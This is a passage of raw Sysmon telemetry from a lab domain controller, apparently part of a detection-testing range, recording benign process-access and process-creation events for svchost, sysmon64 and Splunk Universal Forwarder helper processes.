13:36:08.722{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1905-000000009A01}2124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013656Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:13.472{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013672Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:15.925{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-48CF-6000-6305-000000009A01}4808C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013671Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:15.925{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013670Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:15.925{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013669Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:15.925{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013668Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:15.925{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013667Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:15.925{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-48CF-6000-6305-000000009A01}4808C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013666Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:15.925{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-48CF-6000-6305-000000009A01}4808C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013665Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:15.925{08A6967A-48CF-6000-6305-000000009A01}4808C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013664Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:15.253{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-48CF-6000-6205-000000009A01}6280C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013663Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:15.253{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013662Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:15.253{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013661Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:15.253{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013660Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:15.253{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013659Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:15.253{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-48CF-6000-6205-000000009A01}6280C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013658Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:15.253{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-48CF-6000-6205-000000009A01}6280C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013657Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:15.253{08A6967A-48CF-6000-6205-000000009A01}6280C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013681Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:16.534{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-48D0-6000-6405-000000009A01}4736C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013680Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:16.534{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013679Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:16.534{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013678Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:16.534{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013677Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:16.534{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013676Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:16.534{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-48D0-6000-6405-000000009A01}4736C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013675Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:16.534{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-48D0-6000-6405-000000009A01}4736C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013674Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:16.536{08A6967A-48D0-6000-6405-000000009A01}4736C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013673Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:16.081{08A6967A-48CF-6000-6305-000000009A01}48081432C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013691Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:17.893{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4287-6000-0C00-000000009A01}588C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013690Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:17.659{08A6967A-48D1-6000-6505-000000009A01}29366684C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013689Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:17.503{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-48D1-6000-6505-000000009A01}2936C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013688Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 